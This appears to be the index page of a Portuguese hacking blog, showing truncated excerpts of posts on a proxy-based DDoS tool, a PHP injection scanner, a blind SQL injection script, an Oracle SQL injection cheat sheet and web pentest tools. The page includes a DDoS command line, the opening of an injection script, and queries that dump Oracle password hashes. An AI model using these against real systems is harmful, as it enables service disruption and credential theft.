Barrelroll: A Simple Pycurl DDoS Tool!

Eu fico imaginando a integração de algumas ferramentas existentes no mercado para testar a capacidade de uma rede. Eu estou me referindo ao T50 + o Barrelroll. Essa última lançada há pouco tempo e desenvolvida em Python. A Barrelroll realiza múltiplas conexões em um host utilizando múltiplos proxies.. Imaginem o estrago de uma junção com o T50 ?! A utilização dessa ferramenta é bem simples. Vejam na linha de comando abaixo: ./barrelroll.py 127.0.0.1 localhost 50 < proxies/list1.txt Vale lembrar que ambas ferramentas...

PHP Injection Scanner

É um pouco antigo já, mas quem sabe pode ser útil para alguém. Esse Tool utiliza as técnicas de RFI e LFI  Link Download: PHP Injection Scan...

Blind Twi Injection

 Esse é o Bind SQL Injection. Ao inves de fazer brute force manualmente, pode-se usar uma ferramenta para isso para facilitar. #!/usr/bin/pythonimport urllib,sysbanner = """  ------------------------------------           Blind Twi Injection------------------------------------"""print bannerif len(sys.argv) != 5:   print "Usage: %s <url> <table> <column> <max-caracters>" % sys.argv[0]   print "Ex: %s http://www.site.com/news.php?id=1...

Anonymous: A Grande Farsa. Será?

Como que uma ideologia se diz democrática quando ao mesmo tempo, propõe uma "Ditadura", e o extermínio de uma determinada classe? Não seria isso uma incoerência? Não sejam inocentes úteis nas mãos de "salvadores" não muito bem intencionados. Abram seus olho...

Localizador de IP

Clique na Figura Abaixo: ...

Oracle SQL Injection Cheat Sheet

Version:SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; SELECT banner FROM v$version WHERE banner LIKE 'TNS%';SELECT version FROM v$instance;Comments SELECT 1 FROM dual -- comment -- NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name 'dual' when we're not actually selecting from a table.Current User SELECT USER FROM dual List Users SELECT username FROM all_users ORDER BY username; SELECT name FROM sys.USER$; -- privList Password Hashes SELECT name, password, astatus FROM sys.USER$ --...

IronWASP - Web application Advanced Security testing Platform

IronWASP (Iron Web application Advanced Security testing Platform) é um sistema open source para teste de vulnerabilidade em aplicativos web. Ele é projetado para ser customizável, na medida em que os usuários podem criar seus próprios scanners de segurança personalizados. Voltada tanto a usuários avançados em Python/Ruby com experiência scripting, com uma característica de ferramenta simples o suficiente para ser usado por iniciantes. Baixe, descompacte e leia o README.txt para as instruções de uso.Obs: Requer .NET 2.0Baixar: http://ironwasp.org/download.htmlVídeos:...

A guerra na internet voltou #OpMegaupload

 Poucos minutos depois de o site ser encerrado, e DOJ liberando sua declaração, Hacker's entraram em ação e começou a derrubar uma tonelada de sites - incluindo sites para o Departamento de Justiça, os EUA Escritório de Direitos Autorais, a Universal Music, a RIAA, a MPAA e um monte de outros sites.                                                        ...

FatCat – automatizando SQL Injection

SQL Injection é um dos ataques mais praticados contra aplicações Web. Hackers e crackers buscam falhas no código de aplicações web que dão acesso à base de dados. A tarefa de buscar essas falhas e explorá-las se tornou mais fácil nos últimos anos devido a ferramentas como SQL Map e o FatCat, ferramenta essa que foi divulgada ao público em 9 de janeiro, quer dizer, há poucos dias. FatCat automatiza todo o processo de busca e exploração em aplicações Web, tendo também as seguintes features: Normal SQL Injection Double Query SQL Injection WAF...

Técnicas de Pentest com Multillidae 2.1.13

Mutillidae é um aplicativo gratuito web open source, fornecido para permitir que profissionais de segurança realizem técnicas de pen-test e possam “cortar” uma aplicação web. O utilitário pode ser instalado em sistemas Linux, Windows XP e Windows 7, utilizando XAMMP, tornando fácil a vida daqueles os usuários que não quiserem instalar ou administrar seu próprio webserver.Além disso, Mutillidae contém um grande número de vulnerabilidades e dicas para ajudar o usuário a explorá-las, oferecendo um ambiente bastante fácil de usar, auxiliando...